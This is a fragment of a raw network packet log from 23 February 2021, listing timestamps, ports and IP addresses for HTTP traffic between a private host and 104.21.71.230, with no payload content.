Feb 23, 2021 15:31:13.848205090 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848220110 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848237038 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848253012 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848268986 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848292112 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.848321915 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.848556995 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848581076 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848607063 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848632097 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848656893 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848674059 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.848683119 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848712921 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848741055 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848743916 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.848756075 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.848767042 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848781109 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.848793030 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848819017 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848823071 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.848840952 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848859072 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848875999 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.848910093 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.848918915 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.849545956 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.849574089 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.849592924 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.849608898 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.849622965 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.849636078 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.849639893 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.849649906 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.849663973 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.849663973 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.849682093 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.849694967 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.849701881 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.849714994 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.849726915 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.849740028 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.849752903 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.849760056 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.849769115 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.849797964 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.849824905 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.850431919 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.850451946 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.850467920 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.850485086 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.850502014 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.850514889 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.850532055 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.850544930 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.850560904 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.850573063 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.850585938 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.850599051 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.850610971 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.850630999 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.850687027 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.850737095 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.850744963 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.850749969 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.850754976 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.850761890 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.850769997 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.851352930 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.851371050 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.851387024 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.851398945 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.851414919 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.851430893 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.851488113 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.851514101 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.886461973 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.886512041 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.886547089 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.886574984 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.886603117 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.886631966 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.886631966 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.886667013 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.886668921 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.886672020 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.886713982 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.886723042 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.886756897 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.886791945 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.886827946 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.886854887 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.886864901 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.886881113 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.886902094 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.886955023 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.886992931 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887006998 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.887037039 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.887049913 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887094021 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887129068 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887165070 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887187004 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.887201071 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887223959 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.887233973 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887295008 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887337923 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887365103 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.887384892 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887417078 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887430906 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.887454987 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887486935 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.887490988 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887537956 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.887540102 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887589931 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887628078 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887662888 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887679100 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.887698889 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887716055 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.887736082 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887770891 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887799025 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.887871981 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.889754057 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.889803886 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.889841080 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.889875889 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.889909983 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.889919043 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.889945984 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.889945984 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.889997005 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890048981 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890055895 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.890089989 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890110016 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.890125036 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890156031 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890189886 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890211105 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.890224934 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890244961 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.890261889 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890297890 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890326977 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.890355110 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890396118 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890413046 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.890429974 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890467882 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890503883 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890535116 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.890537977 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890575886 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.890583038 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890630960 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890636921 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.890676975 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890716076 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890733004 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.890754938 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890789986 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890813112 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.890825987 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890861034 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890897989 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890929937 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.890932083 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.890964031 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.890976906 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891016006 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891027927 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.891052008 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891088009 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891123056 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891139984 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.891156912 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891180992 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.891194105 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891230106 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891273975 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891287088 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.891314030 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891320944 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.891359091 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891393900 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891427994 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891454935 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.891463041 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891484976 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.891499996 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891535044 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891575098 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.891577959 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891618013 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891652107 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891657114 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.891689062 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891710997 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.891733885 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891771078 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891791105 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.891807079 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891841888 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891861916 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.891877890 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891913891 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891948938 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891971111 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.891992092 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.891998053 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.892031908 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.892066956 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.892102003 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.892126083 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.892137051 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.892138958 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.892173052 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.892209053 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.892244101 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.892258883 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.892287970 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.892293930 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.892549038 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.892586946 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.892636061 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.892668009 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.892669916 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.892683983 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.892707109 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.892741919 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.892762899 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.892982006 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893019915 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893042088 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.893054962 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893099070 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.893100023 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893140078 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893176079 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893210888 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893234015 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.893246889 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893263102 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.893281937 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893316984 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893351078 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893362999 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.893404007 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.893445969 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893495083 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893537998 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893543005 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.893860102 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893886089 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893908978 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893932104 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893934965 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.893955946 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.893965960 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.894028902 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.894054890 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.894083023 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.894107103 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.894185066 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.894215107 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.894239902 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.894263029 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.894284964 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.894308090 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.894313097 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.894330978 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.894360065 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.894368887 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.894815922 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.894850016 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.894876003 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.894898891 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.894922018 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.894932032 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.894948006 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.894958019 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895015955 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.895021915 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895050049 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895071983 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895083904 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.895097017 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895119905 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895145893 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895160913 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.895176888 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895176888 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.895201921 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895415068 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.895751953 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895780087 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895792007 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895808935 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895823002 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895831108 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.895836115 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895852089 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.895857096 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895874023 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895895958 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895909071 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895915031 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.895921946 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895936966 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895953894 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.895970106 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.896027088 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.896059036 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.896070004 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.896078110 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.896627903 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.896650076 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.896668911 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.896683931 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.896702051 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.896723986 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.896739960 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.896743059 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.896759987 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.896775961 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.896796942 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.896799088 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.896816015 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.896830082 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.896833897 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.896850109 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.896866083 CET	80	49752	104.21.71.230	192.168.2.4
